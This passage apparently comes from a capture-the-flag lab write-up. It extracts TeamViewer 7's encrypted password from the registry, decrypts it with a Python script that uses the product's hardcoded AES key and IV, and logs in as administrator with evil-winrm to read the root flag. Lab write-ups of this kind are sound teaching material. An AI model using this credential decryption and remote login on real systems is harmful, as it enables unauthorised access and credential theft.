PSParentPath              : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\wow6432node\teamviewer
PSChildName               : version7
PSDrive                   : HKLM
PSProvider                : Microsoft.PowerShell.Core\Registry

TeamViewer 7 stores its password in the registry, so we move to that registry key. Then we request the full SecurityPasswordAES entry, of which only the first few bytes were shown above. The result is as follows.

PS HKLM:\software\wow6432node\teamviewer\version7> (get-itemproperty -path .).SecurityPasswordAES
255
155
28
115
214
107
206
49
172
65
62
174
19
27
70
79
88
47
108
226
209
225
243
218
126
141
55
107
38
57
78
91

3.5. Decrypting the TeamViewer password

To decrypt that password, create the file below.

┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# cat decrypt.py       
#!/usr/bin/env python3

from Crypto.Cipher import AES  # provided by pycryptodome

# Static key and IV hardcoded in TeamViewer 7; they are identical on every
# installation, which is why the registry value can be decrypted offline.
key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"

# The 32 bytes read from the SecurityPasswordAES registry value above.
ciphertext = bytes([255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174,
                    19, 27, 70, 79, 88, 47, 108, 226, 209, 225, 243, 218,
                    126, 141, 55, 107, 38, 57, 78, 91])

aes = AES.new(key, AES.MODE_CBC, iv=iv)
# The plaintext is a UTF-16LE string zero-padded out to the block size.
password = aes.decrypt(ciphertext).decode("utf-16-le").rstrip("\x00")

print(f"[+] Found password: {password}")

Then install the pycryptodome module with pip.

┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# pip3 install pycryptodome --break-system-packages
Collecting pycryptodome
  Downloading pycryptodome-3.23.0-cp37-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl.metadata (3.4 kB)
Downloading pycryptodome-3.23.0-cp37-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl (2.2 MB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 2.2/2.2 MB 10.5 MB/s eta 0:00:00
Installing collected packages: pycryptodome
ERROR: pip dependency resolver does not currently take into account all the packages that are installed. This behaviour is the source of the following dependency conflicts.
netexec 1.4.0 requires aardwolf>=0.2.8, which is not installed.                                                                                                                                                                             
netexec 1.4.0 requires jwt>=1.3.1, which is not installed.                                                                                                                                                                                  
Successfully installed pycryptodome-3.23.0                                                                                                                                                                                                  
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager, possibly rendering your system unusable. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv. Use the --root-user-action option if you know what you are doing and want to suppress this warning.                                                                                                             
                                                                                                                                                                                                                                            
┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# python decrypt.py                                
[+] Found password: !R3m0te!

3.6. Obtaining the administrator flag

With that password, administrator-level access is obtained.

┌──(root㉿kali)-[/home/kali/labs/Remote]
└─# evil-winrm -i 10.129.230.172 -u administrator -p '!R3m0te!'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt